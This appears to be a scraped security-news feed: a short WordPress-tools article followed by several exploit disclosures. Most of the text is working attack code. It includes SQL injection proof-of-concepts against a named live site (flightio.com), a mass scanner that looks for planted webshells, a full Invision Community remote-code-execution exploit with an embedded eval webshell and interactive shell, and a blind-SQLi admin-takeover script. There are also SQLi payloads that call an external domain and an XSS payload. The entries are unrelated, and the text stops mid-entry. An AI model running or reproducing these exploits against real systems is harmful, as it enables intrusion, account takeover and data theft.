By Owais Sultan
WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small…
This is a post from HackRead.com Read the original post: The Essential Tools and Plugins for WordPress Development

WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small software components effortlessly improve the functionality of your website. Having the right resources and tools is crucial for developers venturing into WordPress development services. Let’s explore the essential elements that can facilitate and enhance your journey in this field.

****Essential Tools for WordPress Development****

WordPress powers millions of websites worldwide (472 million), from personal blogs to enterprise-level e-commerce platforms. Developers face challenges in such a diverse ecosystem, from writing clean and efficient code to ensuring seamless website deployment and maintenance. The right tools act as enablers, empowering developers to navigate these challenges easily and precisely.

****Code Editors****

Choosing a suitable code editor is akin to selecting the right brush for an artist. Versatile editors like Visual Studio Code or Sublime Text provide many features such as syntax highlighting, auto-completion, and Git integration. These features enhance productivity and foster a conducive environment for writing clean, maintainable code.

****Local Development Environments****

Developing and testing WordPress websites on a live server can be risky and inefficient. Local development environments, facilitated by tools like XAMPP, MAMP, or Docker, provide a safe and controlled environment for experimentation and iteration. Developers can test new features, plugins, and themes without fearing disrupting the live website, ensuring a seamless user experience upon deployment.

****Version Control Systems****

Version control systems like Git are the backbone of efficient teamwork in a collaborative development environment. Paired with platforms like GitHub or Bitbucket, these systems enable developers to manage code changes seamlessly, collaborate with team members in real time, and maintain a comprehensive project history. This fosters a cohesive and organized development environment, ensuring everyone is on the same page throughout the development lifecycle.

****Debugging Tools****

No code is perfect, and debugging is inevitable in the development process. Specialized debugging tools like Query Monitor or Debug Bar provide developers with invaluable insights into the inner workings of their WordPress projects. These tools are indispensable for maintaining a robust and efficient website, from identifying and troubleshooting issues to monitoring performance and optimizing the codebase.

****Must-Have Plugins for WordPress Development****

WordPress’s flexibility and extensibility are key factors contributing to its popularity among developers worldwide. However, the sheer volume of available plugins can be overwhelming, making it essential for developers to discern and integrate the most suitable ones into their projects. Here’s why selecting the right plugins is imperative for effective WordPress development:

****SEO Plugins****

Optimizing websites for search engines is essential for driving organic traffic and enhancing visibility. SEO plugins like Yoast SEO or Rank Math provide developers with robust tools to optimize their WordPress sites effectively. Features such as XML sitemap generation, meta tag optimization, and comprehensive content analysis empower developers to bolster their site’s visibility and relevance in search engine results, increasing organic traffic and user engagement.

****Performance Optimization Plugins****

User experience is paramount in retaining visitors and fostering engagement on WordPress websites. Performance optimization plugins such as WP Rocket or W3 Total Cache offer many optimization features to improve site speed and performance. From caching mechanisms to asset minification and lazy loading, these plugins ensure a snappier and more responsive user experience, leading to higher user satisfaction and retention.

****Security Plugins****

Protecting WordPress websites against security threats is a top priority for developers. Security plugins like Wordfence or Sucuri Security fortify the site’s defences with features such as firewall protection, malware scanning, and enhanced login security. By implementing these plugins, developers can ensure peace of mind against potential threats and vulnerabilities, safeguarding their websites and user data from malicious attacks.

****Development & Debugging Plugins****

Efficient development workflows are essential for maintaining productivity and delivering high-quality WordPress projects. Development and debugging plugins such as Query Monitor or Debug Bar streamline debugging and optimization by providing critical insights into database queries, PHP errors, and HTTP requests. By leveraging these plugins, developers can identify and address issues swiftly, ensuring the seamless operation of WordPress projects and minimizing development time.

****Elevate Your WordPress Development Experience****

Integrating these indispensable tools and plugins into your WordPress development arsenal empowers you to transcend boundaries, streamline processes, and unlock the full potential of your projects. By staying abreast of the latest advancements in the WordPress ecosystem, you can continually refine and optimize your development practices, fostering innovation and excellence in your endeavours.

1.  What To Look For In The Best WordPress Hosting
2.  What is WooCommerce, and Why You Should Care
3.  Kotlin app development company – How to choose
4.  Tips for Using Uploader Widgets on WordPress Blogs
5.  MySQL Performance Tuning: 5 Tips for Blazing Fast Queries

The Essential Tools and Plugins for WordPress Development

Flightio.com suffers from a remote SQL injection vulnerability. The researchers reporting this claimed the site has not responded to their reports so we are posting this to add visibility to the issue.

    This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".We have repeatedly reported to this site that it has a security problem and has ignored our report.We want to record this security issue ##########################################################################################################################                                                                                                                       ##   Exploit Title : Site Flight agency airpol the Islamic Republic of Iran  SQL INJECTION Vulnerability                                                                  ##                                                                                                                       ## Author        : E1.Coders                                                                                             ##                                                                                                                       ## Contact       : E1.Coders [at] Mail [dot] RU                                                                          ##                                                                                                                       ## Portal Link   :   https://flightio.com/                                                                                    ##                                                                                                                       ## Security Risk :   Medium                                                                                                ##                                                                                                                       ## Description   : All target's IRanian AIRPOT websites                                                               ##                                                                                                                       ##  DorK         : "inurl:wp-comments-post.php%5Eauthor="                                                               ##                                                                                                                       ###########################################################################################################################                                                                                                                       ##   Expl0iTs:                                                                                                              ### vuln type  : SQLInjection#  # refer address :   https://flightio.com/blog/attractions/best-chahbahar-attractions/# # request type : POST# # action url :   https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال   دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0# # parameter : comment_parent# # description : POST SQL INJECTION BooleanBased String# # POC :   https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199---------------------------------------##   Expl0iTs:            # vuln type  : SQLInjection#  # refer address :   https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/# # request type : POST# # action url :   https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال   دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319# # parameter : ak_hp_textarea# # description : POST SQL INJECTION BooleanBased String# # POC :   https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199------------------------------------------------# #   Expl0iTs:            # vuln type  : SQLInjection#  # refer address :   https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/# # request type : POST# # action url :   https://flightio.com/blog/wp-comments-post.php^submit=ارسال   دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999# # parameter : author# # description : POST SQL INJECTION BooleanBased String# # POC :   https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199                                                               ###########################################################################################################################                                                                                                                       ##                                        | Security Is JOCK  |                                                          ##                                                                                                                       ##                                        | Russian Black Hat |                                                          ##                                                                                                                       ##########################################################################################################################  Exploit PHP : global $wpdb; $author = '99999999';$comment = 'WCRTEXTAREATESTINPUT9752286';$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116'; $wpdb->prepare(    "INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",    $comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author); $wpdb->insert('wp_comments', array(    'comment_post_ID' => $comment_post_ID,    'comment_author' => $comment_author,    'comment_content' => $comment_content,    'comment_parent' => $comment_parent,    'akismet_comment_nonce' => $akismet_comment_nonce,    'ak_js' => $ak_js,    'author' => $author));

Flightio.com SQL Injection

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

Daily Expense Manager version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi# Date: February 25th, 2024# Exploit Author: Stefan Hesselman# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip# Version: 1.0# Tested on: Kali Linux# CVE: N/A# CWE: CWE-89, CWE-74## DescriptionDaily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.## Vulnerable endpoint:http://example.com/Daily-Expense-Manager/readxp.php?term=asd## Vulnerable HTTP parameter:term (GET)## Exploit proof-of-concept:http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-## Vulnerable PHP code:File: /Daily-Expense-Manager/readxp.php, Lines: 16-23<?php[...]//get search term$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.//get matched data from skills table$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");while ($row = $query->fetch_assoc()) {    $data[] = $row['pname'];}//return json dataecho json_encode($data);?>

Daily Expense Manager 1.0 SQL Injection

### Impact

When a authentificated request is made to `POST /store-api/account/logout`, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on `CustomerLogoutEvent` and invalidates the session additionally. 

### Patches
The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.

### Workarounds
When you are not able to update, you can install the latest version of the Shopware Security Plugin.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-31447

**Shopware Improper Session Handling in store-api account logout**

Moderate severity GitHub Reviewed Published Apr 8, 2024 in shopware/shopware • Updated Apr 8, 2024

**Package**

composer shopware/core (Composer)

**Affected versions**

\>= 6.3.5.0, < 6.5.8.8

\>= 6.6.0.0-rc1, < 6.6.1.0

**Patched versions**

6.5.8.8

6.6.1.0

\>= 6.3.5.0, < 6.5.8.8

\>= 6.6.0.0-rc1, < 6.6.1.0

**Impact**

When a authentificated request is made to POST /store-api/account/logout, the cart will be cleared, but the User won't be logged out. This affects only the direct store-api usage, as the PHP Storefront listens additionally on CustomerLogoutEvent and invalidates the session additionally.

**Patches**

The problem has been fixed with Shopware 6.6.1.0 and 6.5.8.8.

**Workarounds**

When you are not able to update, you can install the latest version of the Shopware Security Plugin.

**References**

*   GHSA-5297-wrrp-rcj7
*   shopware/shopware@5cc84dd
*   shopware/shopware@d29775a

Published to the GitHub Advisory Database

Apr 8, 2024

GHSA-5297-wrrp-rcj7: Shopware Improper Session Handling in store-api account logout

Invision Community versions 4.7.16 and below suffer from a remote code execution vulnerability in toolbar.php.

    ------------------------------------------------------------------------------Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability------------------------------------------------------------------------------[-] Software Link:https://invisioncommunity.com[-] Affected Versions:Version 4.7.16 and prior versions.[-] Vulnerability Description:The vulnerability is located in the/applications/core/modules/admin/editor/toolbar.php script.Specifically, into theIPS\core\modules\admin\editor\_toolbar::addPlugin() method, which willhandlethe upload of a ZIP file, trying to extract its content into the/applications/core/interface/ckeditor/ckeditor/plugins/ directory; ifthe ZIP archive does not includea plugin.js file, then the extracted ZIP content will be recursivelydeleted from the file system,otherwise it will stay there. This can be exploited to executearbitrary PHP code by uploading aZIP archive containing a plugin.js file (which can also be empty)along with a PHP file. Successfulexploitation of this vulnerability requires an Administrator accounthaving the "toolbar_manage" permission.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2024-30162.php[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed[20/03/2024] - CVE identifier requested[24/03/2024] - CVE identifier assigned[05/04/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2024-30162 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-03-----------------------PoC:<?php/*    ------------------------------------------------------------------------------    Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability    ------------------------------------------------------------------------------    author..............: Egidio Romano aka EgiX    mail................: n0b0d13s[at]gmail[dot]com    software link.......: https://invisioncommunity.com    +-------------------------------------------------------------------------+    | This proof of concept code was written for educational purpose only.    |    | Use it at your own risk. Author will be not responsible for any damage. |    +-------------------------------------------------------------------------+    [-] Vulnerability Description:    The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.    Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will    handle the upload of a ZIP file, trying to extract its content into the    /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does    not include a plugin.js file, then the extracted ZIP content will be recursively deleted    from the file system, otherwise it will stay there. This can be exploited to execute    arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can    also be empty) along with a PHP file. Successful exploitation of this vulnerability    requires an Administrator account having the "toolbar_manage" permission.    [-] Original Advisory:    https://karmainsecurity.com/KIS-2024-03*/set_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");$url = $argv[1];$email = $argv[2];$passwd = $argv[3];$ch = curl_init();@unlink('./cookies.txt');curl_setopt($ch, CURLOPT_HEADER, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');print "[+] Logging into AdminCP\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");print "[+] Uploading malicious ZIP file\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");$plg = md5(time()).".zip";@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];curl_setopt($ch, CURLOPT_POSTFIELDS, $params);if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");print "[+] Launching shell\n";curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");curl_setopt($ch, CURLOPT_POST, false);$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";while(1){  print "\ninvision-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);  preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");}

Invision Community 4.7.16 Remote Code Execution

Invision Community versions 4.4.0 through 4.7.15 suffer from a remote SQL injection vulnerability in store.php.

--------------------------------------------------------------------  
Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
--------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

All versions from 4.4.0 to 4.7.15.

[-] Vulnerability Description:

The vulnerability is located in the  
/applications/nexus/modules/front/store/store.php script.  
Specifically, into the  
IPS\nexus\modules\front\store\_store::_categoryView() method:

126 /* Apply Filters */  
127 if ( isset( \IPS\Request::i()->filter ) and \is_array(  
\IPS\Request::i()->filter ) )  
128 {  
129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );  
130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )  
131 {  
132 $where[] = array( \IPS\Db::i()->findInSet(  
"filter{$filterId}.pfm_values", array_map( 'intval', explode( ',',  
$allowedValues ) ) ) );  
133 $joins[] = array( 'table' => array( 'nexus_package_filters_map',  
"filter{$filterId}" ), 'on' => array(  
"filter{$filterId}.pfm_package=p_id AND  
filter{$filterId}.pfm_filter=?", $filterId ) );  
134 }  
135 }

User input passed through the "filter" request parameter is not  
properly sanitized before being  
assigned to the $where and $joins variables (lines 132 and 133), which  
are later used to execute  
some SQL queries. This can be exploited by unauthenticated attackers  
to carry out time-based or  
error-based Blind SQL Injection attacks. Subsequently, this might also  
be exploited to reset  
users' passwords and gain unauthorized access to the AdminCP, in order  
to achieve  
Remote Code Execution (RCE). Successful exploitation of this  
vulnerability requires  
the nexus application to be installed and configured with one "Product  
Group" at least.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-30163.php

[-] Solution:

Upgrade to version 4.7.16 or later.

[-] Disclosure Timeline:

[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure  
[12/03/2024] - Version 4.7.16 released  
[20/03/2024] - CVE identifier requested  
[24/03/2024] - CVE identifier assigned  
[05/04/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2024-30163 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://invisioncommunity.com/release-notes/4716-r128/  
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-02

-----------------------  
PoC:

<?php

/*  
    --------------------------------------------------------------------  
    Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
    --------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.  
    Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user  
    input passed through the "filter" request parameter is not properly sanitized before being  
    assigned to the $where and $joins variables, which are later used to execute some SQL  
    queries. This can be exploited by unauthenticated attackers to carry out time-based  
    or error-based SQL Injection attacks.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2024-02  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

$url = $argv[1];  
$ch  = curl_init();  
$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");

function sql_injection($sql)  
{  
  global $ch, $sec;

  $min = true;  
  $idx = 1;

  while(1)  
  {  
    $test = 256;

    for ($i = 7; $i >= 0; $i--)  
    {  
      $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i));  
      $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#";  
      curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection)));  
      $start = time(); curl_exec($ch); $secs = time() - $start;  
      $min = ($secs < $sec);  
    }

    if (($chr = $min ? ($test - 1) : ($test)) == 0) break;  
    $data .= chr($chr); $min = true; $idx++;  
    print "\r[*] Data: {$data}";  
  }

  return $data;  
}

print "[+] Step 1: fetching admin's e-mail address\n";

$email = sql_injection("SELECT email FROM core_members WHERE member_id=1");

print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";

fgets(STDIN);

print "[+] Step 3: fetching the password reset key\n";

$vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");

print "\n[+] Step 4: taking over the admin account by resetting their password\n";

@unlink('./cookies.txt');

curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");  
curl_setopt($ch, CURLOPT_POST, false);  
curl_setopt($ch, CURLOPT_HEADER, true);  
curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');  
curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');

if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");

$passwd = md5(time());  
$params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";

curl_setopt($ch, CURLOPT_POSTFIELDS, $params);

if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");

print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n";

Invision Community 4.7.15 SQL Injection

UP-RESULT version 0.1 2024 suffers from a remote SQL injection vulnerability.

    ## Title: upresult_0.1-2024 Multiple-SQLi## Author: nu11secur1ty## Date: 04/08/2024## Vendor: https://www.mayurik.com/## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download## Reference: https://portswigger.net/web-security/sql-injection## Description:The nid parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'was submitted in the nid parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.The attacker can get all information from the system by using thisvulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: nid (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM(SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECTNULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html)## Time spent:00:15:00

UP-RESULT 0.1 2024 SQL Injection

Feng Office version 3.10.8.21 suffers from a persistent cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: Feng Office version 3.10.8.21  - Stored XSS# Exploit Author: tmrswrr # Vendor Homepage: https://www.fengoffice.com/# version 3.10.8.21 1 ) Login admin https://127.0.0.1/Feng_Office/index.php?c=access&a=index#2 ) Click Tasks > "><img src=x onerrora=confirm() onerror=confirm(1)> add task 3 ) Click Add worked hours you will be see xss alert

Feng Office 3.10.8.21 Cross Site Scripting

DerbyNet 9.0 suffers from a remote SQL injection vulnerability in print/render/racer.inc.

CVE ID: CVE-2024-30923

Description:  
